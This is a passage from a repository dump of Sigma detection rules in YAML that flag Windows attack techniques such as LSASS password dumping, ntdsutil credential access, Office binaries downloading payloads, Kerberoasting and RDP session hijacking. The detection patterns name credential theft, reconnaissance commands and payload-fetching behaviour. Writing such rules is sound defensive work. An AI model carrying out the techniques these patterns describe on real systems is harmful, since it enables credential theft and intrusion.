26 | falsepositives:
27 | - Administrative activity via KVM or ILO board
28 | level: medium
29 |
30 |
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_iss_module_install.yml:
--------------------------------------------------------------------------------
1 | title: IIS Native-Code Module Command Line Installation
2 | id: 9465ddf4-f9e4-4ebd-8d98-702df3a93239
3 | description: Detects suspicious IIS native-code module installations via command line
4 | status: experimental
5 | references:
6 | - https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/
7 | author: Florian Roth
8 | modified: 2012/12/11
9 | tags:
10 | - attack.persistence
11 | - attack.t1100
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - '*\APPCMD.EXE install module /name:*'
19 | condition: selection
20 | falsepositives:
21 | - Unknown as it may vary from organisation to arganisation how admins use to install IIS modules
22 | level: medium
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_lsass_dump.yml:
--------------------------------------------------------------------------------
1 | title: Password Dumper Activity on LSASS
2 | id: aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c
3 | description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN
4 | status: experimental
5 | references:
6 | - https://twitter.com/jackcr/status/807385668833968128
7 | tags:
8 | - attack.credential_access
9 | - attack.t1003
10 | logsource:
11 | product: windows
12 | service: security
13 | detection:
14 | selection:
15 | EventID: 4656
16 | ProcessName: 'C:\Windows\System32\lsass.exe'
17 | AccessMask: '0x705'
18 | ObjectType: 'SAM_DOMAIN'
19 | condition: selection
20 | falsepositives:
21 | - Unkown
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_msiexec_cwd.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious MsiExec Directory
2 | id: e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144
3 | status: experimental
4 | description: Detects suspicious msiexec process starts in an uncommon directory
5 | references:
6 | - https://twitter.com/200_okay_/status/1194765831911215104
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1036
10 | author: Florian Roth
11 | date: 2019/11/14
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\msiexec.exe'
18 | filter:
19 | Image:
20 | - 'C:\Windows\System32\\*'
21 | - 'C:\Windows\SysWOW64\\*'
22 | - 'C:\Windows\WinSxS\\*'
23 | condition: selection and not filter
24 | falsepositives:
25 | - Unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_msoffice.yml:
--------------------------------------------------------------------------------
1 | title: Malicious payload download via Office binaries
2 | id: 0c79148b-118e-472b-bdb7-9b57b444cc19
3 | status: experimental
4 | description: Downloads payload from remote server
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Powerpnt.yml
7 | - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
8 | - Reegun J (OCBC Bank)
9 | author: Beyu Denis, oscd.community
10 | date: 2019/10/26
11 | modified: 2019/11/04
12 | tags:
13 | - attack.command_and_control
14 | - attack.t1105
15 | level: high
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith:
22 | - '\powerpnt.exe'
23 | - '\winword.exe'
24 | - '\excel.exe'
25 | CommandLine|contains: 'http'
26 | condition: selection
27 | falsepositives:
28 | - Unknown
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ntdsutil.yml:
--------------------------------------------------------------------------------
1 | title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
2 | id: 2afafd61-6aae-4df4-baed-139fa1f4c345
3 | description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
4 | status: experimental
5 | references:
6 | - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
7 | author: Thomas Patzke
8 | tags:
9 | - attack.credential_access
10 | - attack.t1003
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | CommandLine: '*\ntdsutil*'
17 | condition: selection
18 | falsepositives:
19 | - NTDS maintenance
20 | level: high
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ntlm_auth.yml:
--------------------------------------------------------------------------------
1 | title: NTLM Logon
2 | id: 98c3bcf1-56f2-49dc-9d8d-c66cf190238b
3 | status: experimental
4 | description: Detects logons using NTLM, which could be caused by a legacy source or attackers
5 | references:
6 | - https://twitter.com/JohnLaTwC/status/1004895028995477505
7 | - https://goo.gl/PsqrhT
8 | author: Florian Roth
9 | date: 2018/06/08
10 | tags:
11 | - attack.lateral_movement
12 | - attack.t1075
13 | logsource:
14 | product: windows
15 | service: ntlm
16 | definition: Reqiures events from Microsoft-Windows-NTLM/Operational
17 | detection:
18 | selection:
19 | EventID: 8002
20 | CallingProcessName: '*' # We use this to avoid false positives with ID 8002 on other log sources if the logsource isn't set correctly
21 | condition: selection
22 | falsepositives:
23 | - Legacy hosts
24 | level: low
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_openwith.yml:
--------------------------------------------------------------------------------
1 | title: OpenWith.exe executes specified binary
2 | id: cec8e918-30f7-4e2d-9bfa-a59cc97ae60f
3 | status: experimental
4 | description: The OpenWith.exe executes other binary
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Openwith.yml
7 | - https://twitter.com/harr0ey/status/991670870384021504
8 | author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
9 | date: 2019/10/12
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: high
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\OpenWith.exe'
22 | CommandLine|contains: '/c'
23 | condition: selection
24 | falsepositives:
25 | - Legitimate use of OpenWith.exe by legitimate user
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_outlook.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Execution from Outlook
2 | id: e212d415-0e93-435f-9e1a-f29005bb4723
3 | status: experimental
4 | description: Detects EnableUnsafeClientMailRules used for Script Execution from Outlook
5 | references:
6 | - https://github.com/sensepost/ruler
7 | - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
8 | tags:
9 | - attack.execution
10 | - attack.t1059
11 | - attack.t1202
12 | author: Markus Neis
13 | date: 2018/12/27
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | clientMailRules:
19 | CommandLine: '*EnableUnsafeClientMailRules*'
20 | outlookExec:
21 | ParentImage: '*\outlook.exe'
22 | CommandLine: \\\\*\\*.exe
23 | condition: clientMailRules or outlookExec
24 | falsepositives:
25 | - unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_outlook_temp.yml:
--------------------------------------------------------------------------------
1 | title: Execution in Outlook Temp Folder
2 | id: a018fdc3-46a3-44e5-9afb-2cd4af1d4b39
3 | status: experimental
4 | description: Detects a suspicious program execution in Outlook temp folder
5 | author: Florian Roth
6 | date: 2019/10/01
7 | tags:
8 | - attack.initial_access
9 | - attack.t1193
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | Image: '*\Temporary Internet Files\Content.Outlook\\*'
16 | condition: selection
17 | fields:
18 | - CommandLine
19 | - ParentCommandLine
20 | falsepositives:
21 | - Unknown
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ping_hex_ip.yml:
--------------------------------------------------------------------------------
1 | title: Ping Hex IP
2 | id: 1a0d4aba-7668-4365-9ce4-6d79ab088dfd
3 | description: Detects a ping command that uses a hex encoded IP address
4 | references:
5 | - https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna
6 | - https://twitter.com/vysecurity/status/977198418354491392
7 | author: Florian Roth
8 | date: 2018/03/23
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1140
12 | - attack.t1027
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - '*\ping.exe 0x*'
20 | - '*\ping 0x*'
21 | condition: selection
22 | fields:
23 | - ParentCommandLine
24 | falsepositives:
25 | - Unlikely, because no sane admin pings IP addresses in a hexadecimal form
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_prog_location_process_starts.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Program Location Process Starts
2 | id: f50bfd8b-e2a3-4c15-9373-7900b5a4c6d5
3 | status: experimental
4 | description: Detects programs running in suspicious files system locations
5 | references:
6 | - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1036
10 | author: Florian Roth
11 | date: 2019/01/15
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image:
18 | - '*\$Recycle.bin'
19 | - '*\Users\Public\\*'
20 | - 'C:\Perflogs\\*'
21 | - '*\Windows\Fonts\\*'
22 | - '*\Windows\IME\\*'
23 | - '*\Windows\addins\\*'
24 | - '*\Windows\debug\\*'
25 | condition: selection
26 | falsepositives:
27 | - unknown
28 | level: high
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ps_appdata.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Script Run in AppData
2 | id: ac175779-025a-4f12-98b0-acdaeb77ea85
3 | status: experimental
4 | description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
5 | references:
6 | - https://twitter.com/JohnLaTwC/status/1082851155481288706
7 | - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03
8 | tags:
9 | - attack.execution
10 | - attack.t1086
11 | author: Florian Roth
12 | date: 2019/01/09
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - '* /c powershell*\AppData\Local\\*'
20 | - '* /c powershell*\AppData\Roaming\\*'
21 | condition: selection
22 | falsepositives:
23 | - Administrative scripts
24 | level: medium
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_psr_capture_screenshots.yml:
--------------------------------------------------------------------------------
1 | title: psr.exe capture screenshots
2 | id: 2158f96f-43c2-43cb-952a-ab4580f32382
3 | status: experimental
4 | description: The psr.exe captures desktop screenshots and saves them on the local machine
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Psr.yml
7 | - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/12
10 | modified: 2019/11/04
11 | tags:
12 | - attack.persistence
13 | - attack.t1218
14 | level: medium
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | detection:
19 | selection:
20 | Image|endswith: '\Psr.exe'
21 | CommandLine|contains: '/start'
22 | condition: selection
23 | falsepositives:
24 | - Unknown
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_rasdial_activity.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious RASdial Activity
2 | id: 6bba49bf-7f8c-47d6-a1bb-6b4dece4640e
3 | description: Detects suspicious process related to rasdial.exe
4 | status: experimental
5 | references:
6 | - https://twitter.com/subTee/status/891298217907830785
7 | author: juju4
8 | tags:
9 | - attack.defense_evasion
10 | - attack.execution
11 | - attack.t1064
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - rasdial
19 | condition: selection
20 | falsepositives:
21 | - False positives depend on scripts and administrative tools used in the monitored environment
22 | level: medium
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_rc4_kerberos.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Kerberos RC4 Ticket Encryption
2 | id: 496a0e47-0a33-4dca-b009-9e6ca3591f39
3 | status: experimental
4 | references:
5 | - https://adsecurity.org/?p=3458
6 | - https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity
7 | tags:
8 | - attack.credential_access
9 | - attack.t1208
10 | description: Detects service ticket requests using RC4 encryption type
11 | logsource:
12 | product: windows
13 | service: security
14 | detection:
15 | selection:
16 | EventID: 4769
17 | TicketOptions: '0x40810000'
18 | TicketEncryptionType: '0x17'
19 | reduction:
20 | - ServiceName: '$*'
21 | condition: selection and not reduction
22 | falsepositives:
23 | - Service accounts used on legacy systems (e.g. NetApp)
24 | - Windows Domains with DFL 2003 and legacy systems
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_recon_activity.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Reconnaissance Activity
2 | id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0
3 | status: experimental
4 | description: Detects suspicious command line activity on Windows systems
5 | author: Florian Roth
6 | tags:
7 | - attack.discovery
8 | - attack.t1087
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | CommandLine:
15 | - net group "domain admins" /domain
16 | - net localgroup administrators
17 | condition: selection
18 | fields:
19 | - CommandLine
20 | - ParentCommandLine
21 | falsepositives:
22 | - Inventory tool runs
23 | - Penetration tests
24 | - Administrative activity
25 | analysis:
26 | recommendation: Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
27 | level: medium
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_rottenpotato.yml:
--------------------------------------------------------------------------------
1 | title: RottenPotato Like Attack Pattern
2 | id: 16f5d8ca-44bd-47c8-acbe-6fc95a16c12f
3 | status: experimental
4 | description: Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like
5 | references:
6 | - https://twitter.com/SBousseaden/status/1195284233729777665
7 | author: "@SBousseaden, Florian Roth"
8 | date: 2019/11/15
9 | tags:
10 | - attack.privilege_escalation
11 | - attack.credential_access
12 | - attack.t1171
13 | logsource:
14 | product: windows
15 | service: security
16 | detection:
17 | selection:
18 | EventID: 4624
19 | LogonType: 3
20 | TargetUserName: 'ANONYMOUS_LOGON'
21 | WorkstationName: '-'
22 | SourceNetworkAddress: '127.0.0.1'
23 | condition: selection
24 | falsepositives:
25 | - Unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_rundll32_by_ordinal.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Call by Ordinal
2 | id: e79a9e79-eb72-4e78-a628-0e7e8f59e89c
3 | description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal
4 | status: experimental
5 | references:
6 | - https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/
7 | - https://github.com/Neo23x0/DLLRunner
8 | - https://twitter.com/cyb3rops/status/1186631731543236608
9 | tags:
10 | - attack.defense_evasion
11 | - attack.execution
12 | - attack.t1085
13 | author: Florian Roth
14 | date: 2019/10/22
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | detection:
19 | selection:
20 | CommandLine: '*\rundll32.exe *,#*'
21 | condition: selection
22 | falsepositives:
23 | - False positives depend on scripts and administrative tools used in the monitored environment
24 | - Windows contol panel elements have been identified as source (mmc)
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_sam_dump.yml:
--------------------------------------------------------------------------------
1 | title: SAM Dump to AppData
2 | id: 839dd1e8-eda8-4834-8145-01beeee33acd
3 | status: experimental
4 | description: Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers
5 | tags:
6 | - attack.credential_access
7 | - attack.t1003
8 | author: Florian Roth
9 | logsource:
10 | product: windows
11 | service: system
12 | definition: The source of this type of event is Kernel-General
13 | detection:
14 | selection:
15 | EventID: 16
16 | keywords:
17 | Message:
18 | - '*\AppData\Local\Temp\SAM-*.dmp *'
19 | condition: all of them
20 | falsepositives:
21 | - Penetration testing
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_samr_pwset.yml:
--------------------------------------------------------------------------------
1 | title: Possible Remote Password Change Through SAMR
2 | id: 7818b381-5eb1-4641-bea5-ef9e4cfb5951
3 | description: Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced
4 | Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events.
5 | author: Dimitrios Slamaris
6 | tags:
7 | - attack.credential_access
8 | - attack.t1212
9 | logsource:
10 | product: windows
11 | service: security
12 | detection:
13 | samrpipe:
14 | EventID: 5145
15 | RelativeTargetName: samr
16 | passwordchanged:
17 | EventID: 4738
18 | passwordchanged_filter:
19 | PasswordLastSet: null
20 | timeframe: 15s
21 | condition: ( passwordchanged and not passwordchanged_filter ) | near samrpipe
22 | level: medium
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_schtask_creation.yml:
--------------------------------------------------------------------------------
1 | title: Scheduled Task Creation
2 | id: 92626ddd-662c-49e3-ac59-f6535f12d189
3 | status: experimental
4 | description: Detects the creation of scheduled tasks in user session
5 | author: Florian Roth
6 | logsource:
7 | category: process_creation
8 | product: windows
9 | detection:
10 | selection:
11 | Image: '*\schtasks.exe'
12 | CommandLine: '* /create *'
13 | filter:
14 | User: NT AUTHORITY\SYSTEM
15 | condition: selection and not filter
16 | fields:
17 | - CommandLine
18 | - ParentCommandLine
19 | tags:
20 | - attack.execution
21 | - attack.persistence
22 | - attack.privilege_escalation
23 | - attack.t1053
24 | - attack.s0111
25 | - car.2013-08-001
26 | falsepositives:
27 | - Administrative activity
28 | - Software installation
29 | level: low
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_script_execution.yml:
--------------------------------------------------------------------------------
1 | title: WSF/JSE/JS/VBA/VBE File Execution
2 | id: 1e33157c-53b1-41ad-bbcc-780b80b58288
3 | status: experimental
4 | description: Detects suspicious file execution by wscript and cscript
5 | author: Michael Haag
6 | tags:
7 | - attack.execution
8 | - attack.t1064
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image:
15 | - '*\wscript.exe'
16 | - '*\cscript.exe'
17 | CommandLine:
18 | - '*.jse'
19 | - '*.vbe'
20 | - '*.js'
21 | - '*.vba'
22 | condition: selection
23 | fields:
24 | - CommandLine
25 | - ParentCommandLine
26 | falsepositives:
27 | - Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy.
28 | level: medium
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_sdelete.yml:
--------------------------------------------------------------------------------
1 | title: Secure Deletion with SDelete
2 | id: 39a80702-d7ca-4a83-b776-525b1f86a36d
3 | status: experimental
4 | description: Detects renaming of file while deletion with SDelete tool
5 | author: Thomas Patzke
6 | references:
7 | - https://jpcertcc.github.io/ToolAnalysisResultSheet
8 | - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
9 | - https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx
10 | tags:
11 | - attack.defense_evasion
12 | - attack.t1107
13 | - attack.t1066
14 | - attack.s0195
15 | logsource:
16 | product: windows
17 | service: security
18 | detection:
19 | selection:
20 | EventID:
21 | - 4656
22 | - 4663
23 | - 4658
24 | ObjectName:
25 | - '*.AAA'
26 | - '*.ZZZ'
27 | condition: selection
28 | falsepositives:
29 | - Legitime usage of SDelete
30 | level: medium
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_security_eventlog_cleared.yml:
--------------------------------------------------------------------------------
1 | title: Security Eventlog Cleared
2 | id: f2f01843-e7b8-4f95-a35a-d23584476423
3 | description: Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities
4 | tags:
5 | - attack.defense_evasion
6 | - attack.t1070
7 | - car.2016-04-002
8 | author: Florian Roth
9 | logsource:
10 | product: windows
11 | service: security
12 | detection:
13 | selection:
14 | EventID:
15 | - 517
16 | - 1102
17 | condition: selection
18 | falsepositives:
19 | - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)
20 | - System provisioning (system reset before the golden image creation)
21 | level: high
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_svchost.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Svchost Process
2 | id: 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d
3 | status: experimental
4 | description: Detects a suspicious svchost process start
5 | tags:
6 | - attack.defense_evasion
7 | - attack.t1036
8 | author: Florian Roth
9 | date: 2017/08/15
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | Image: '*\svchost.exe'
16 | filter:
17 | ParentImage:
18 | - '*\services.exe'
19 | - '*\MsMpEng.exe'
20 | - '*\Mrt.exe'
21 | - '*\rpcnet.exe'
22 | filter_null:
23 | ParentImage: null
24 | condition: selection and not filter and not filter_null
25 | fields:
26 | - CommandLine
27 | - ParentCommandLine
28 | falsepositives:
29 | - Unknown
30 | level: high
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_sysvol_access.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious SYSVOL Domain Group Policy Access
2 | id: 05f3c945-dcc8-4393-9f3d-af65077a8f86
3 | status: experimental
4 | description: Detects Access to Domain Group Policies stored in SYSVOL
5 | references:
6 | - https://adsecurity.org/?p=2288
7 | - https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100
8 | author: Markus Neis
9 | date: 2018/04/09
10 | modified: 2018/12/11
11 | tags:
12 | - attack.credential_access
13 | - attack.t1003
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | CommandLine: '*\SYSVOL\\*\policies\\*'
20 | condition: selection
21 | falsepositives:
22 | - administrative activity
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_taskmgr_localsystem.yml:
--------------------------------------------------------------------------------
1 | title: Taskmgr as LOCAL_SYSTEM
2 | id: 9fff585c-c33e-4a86-b3cd-39312079a65f
3 | status: experimental
4 | description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
5 | tags:
6 | - attack.defense_evasion
7 | - attack.t1036
8 | author: Florian Roth
9 | date: 2018/03/18
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | User: NT AUTHORITY\SYSTEM
16 | Image: '*\taskmgr.exe'
17 | condition: selection
18 | falsepositives:
19 | - Unkown
20 | level: high
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_taskmgr_parent.yml:
--------------------------------------------------------------------------------
1 | title: Taskmgr as Parent
2 | id: 3d7679bd-0c00-440c-97b0-3f204273e6c7
3 | status: experimental
4 | description: Detects the creation of a process from Windows task manager
5 | tags:
6 | - attack.defense_evasion
7 | - attack.t1036
8 | author: Florian Roth
9 | date: 2018/03/13
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | ParentImage: '*\taskmgr.exe'
16 | filter:
17 | Image:
18 | - '*\resmon.exe'
19 | - '*\mmc.exe'
20 | - '*\taskmgr.exe'
21 | condition: selection and not filter
22 | fields:
23 | - Image
24 | - CommandLine
25 | - ParentCommandLine
26 | falsepositives:
27 | - Administrative activity
28 | level: low
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_tscon_localsystem.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious TSCON Start
2 | id: 9847f263-4a81-424f-970c-875dab15b79b
3 | status: experimental
4 | description: Detects a tscon.exe start as LOCAL SYSTEM
5 | references:
6 | - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
7 | - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
8 | author: Florian Roth
9 | date: 2018/03/17
10 | tags:
11 | - attack.command_and_control
12 | - attack.t1219
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | User: NT AUTHORITY\SYSTEM
19 | Image: '*\tscon.exe'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_tscon_rdp_redirect.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious RDP Redirect Using TSCON
2 | id: f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb
3 | status: experimental
4 | description: Detects a suspicious RDP session redirect using tscon.exe
5 | references:
6 | - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
7 | - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
8 | tags:
9 | - attack.lateral_movement
10 | - attack.privilege_escalation
11 | - attack.t1076
12 | - car.2013-07-002
13 | author: Florian Roth
14 | date: 2018/03/17
15 | modified: 2018/12/11
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | CommandLine: '* /dest:rdp-tcp:*'
22 | condition: selection
23 | falsepositives:
24 | - Unknown
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_whoami.yml:
--------------------------------------------------------------------------------
1 | title: Whoami Execution
2 | id: e28a5a99-da44-436d-b7a0-2afc20a5f413
3 | status: experimental
4 | description: Detects the execution of whoami, which is often used by attackers after exloitation / privilege escalation but rarely used by administrators
5 | references:
6 | - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/
7 | - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
8 | author: Florian Roth
9 | date: 2018/08/13
10 | tags:
11 | - attack.discovery
12 | - attack.t1033
13 | - car.2016-03-001
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | Image: '*\whoami.exe'
20 | selection2:
21 | OriginalFileName: 'whoami.exe'
22 | condition: selection or selection2
23 | falsepositives:
24 | - Admin activity
25 | - Scripts and administrative tools used in the monitored environment
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_wmi_login.yml:
--------------------------------------------------------------------------------
1 | title: Login with WMI
2 | id: 5af54681-df95-4c26-854f-2565e13cfab0
3 | status: stable
4 | description: Detection of logins performed with WMI
5 | author: Thomas Patzke
6 | tags:
7 | - attack.execution
8 | - attack.t1047
9 | logsource:
10 | product: windows
11 | service: security
12 | detection:
13 | selection:
14 | EventID: 4624
15 | ProcessName: "*\\WmiPrvSE.exe"
16 | condition: selection
17 | falsepositives:
18 | - Monitoring tools
19 | - Legitimate system administration
20 | level: low
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_usb_device_plugged.yml:
--------------------------------------------------------------------------------
1 | title: USB Device Plugged
2 | id: 1a4bd6e3-4c6e-405d-a9a3-53a116e341d4
3 | description: Detects plugged USB devices
4 | references:
5 | - https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/
6 | - https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/
7 | status: experimental
8 | author: Florian Roth
9 | tags:
10 | - attack.initial_access
11 | - attack.t1200
12 | logsource:
13 | product: windows
14 | service: driver-framework
15 | detection:
16 | selection:
17 | EventID:
18 | - 2003 # Loading drivers
19 | - 2100 # Pnp or power management
20 | - 2102 # Pnp or power management
21 | condition: selection
22 | falsepositives:
23 | - Legitimate administrative activity
24 | level: low
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_user_added_to_local_administrators.yml:
--------------------------------------------------------------------------------
1 | title: User Added to Local Administrators
2 | id: c265cf08-3f99-46c1-8d59-328247057d57
3 | description: This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation
4 | activity
5 | status: stable
6 | author: Florian Roth
7 | tags:
8 | - attack.privilege_escalation
9 | - attack.t1078
10 | logsource:
11 | product: windows
12 | service: security
13 | detection:
14 | selection:
15 | EventID: 4732
16 | selection_group1:
17 | GroupName: 'Administrators'
18 | selection_group2:
19 | GroupSid: 'S-1-5-32-544'
20 | filter:
21 | SubjectUserName: '*$'
22 | condition: selection and (1 of selection_group*) and not filter
23 | falsepositives:
24 | - Legitimate administrative activity
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_user_creation.yml:
--------------------------------------------------------------------------------
1 | title: Detects local user creation
2 | id: 66b6be3d-55d0-4f47-9855-d69df21740ea
3 | description: Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows
4 | server logs and not on your DC logs.
5 | status: experimental
6 | tags:
7 | - attack.persistence
8 | - attack.t1136
9 | references:
10 | - https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/
11 | author: Patrick Bareiss
12 | logsource:
13 | product: windows
14 | service: security
15 | detection:
16 | selection:
17 | EventID: 4720
18 | condition: selection
19 | fields:
20 | - EventCode
21 | - AccountName
22 | - AccountDomain
23 | falsepositives:
24 | - Domain Controller Logs
25 | - Local accounts managed by privileged account management tools
26 | level: low
27 |
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_vul_java_remote_debugging.yml:
--------------------------------------------------------------------------------
1 | title: Java Running with Remote Debugging
2 | id: 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710
3 | description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
4 | author: Florian Roth
5 | tags:
6 | - attack.discovery
